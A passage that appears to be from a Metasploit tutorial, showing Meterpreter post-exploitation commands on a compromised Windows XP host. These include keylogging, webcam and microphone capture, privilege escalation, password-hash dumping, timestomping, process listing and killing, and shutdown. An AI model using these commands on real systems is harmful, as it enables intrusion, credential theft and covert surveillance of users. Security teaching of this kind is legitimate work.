    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
=======================

    Command      Description
    -------      -----------
    record_mic   Record audio from the default microphone for X seconds
    webcam_list  List webcams
    webcam_snap  Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

    Command    Description
    -------    -----------
    getsystem  Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

    Command   Description
    -------   -----------
    hashdump  Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

    Command    Description
    -------    -----------
    timestomp  Manipulate file MACE attributes

Process 1452 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
To see the process list (the task manager) of the exploited Windows machine:
meterpreter > ps

Process list
============

 PID   Name          Arch  Session  User                          Path
 ---   ----          ----  -------  ----                          ----
 0     [System Process]
 1048  svchost.exe   x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1060  wpabaln.exe   x86   0        XP\HP                         C:\WINDOWS\system32\wpabaln.exe
 1080  svchost.exe   x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1392  spoolsv.exe   x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1508  explorer.exe  x86   0        XP\HP                         C:\WINDOWS\Explorer.EXE
 232   cmd.exe       x86   0        XP\HP                         C:\WINDOWS\system32\cmd.exe
 356   smss.exe      x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 4     System        x86   0        NT AUTHORITY\SYSTEM
 496   cmd.exe       x86   0        XP\HP                         C:\WINDOWS\system32\cmd.exe
 552   wscntfy.exe   x86   0        XP\HP                         C:\WINDOWS\system32\wscntfy.exe
 568   csrss.exe     x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 592   winlogon.exe  x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 636   services.exe  x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 648   lsass.exe     x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 804   svchost.exe   x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 836   alg.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
 884   svchost.exe   x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 984   svchost.exe   x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
To kill a process on the exploited Windows machine (here the cmd.exe with PID 232 from the list above):
meterpreter > kill 232
Killing: 232
To shut down Windows:
meterpreter > shutdown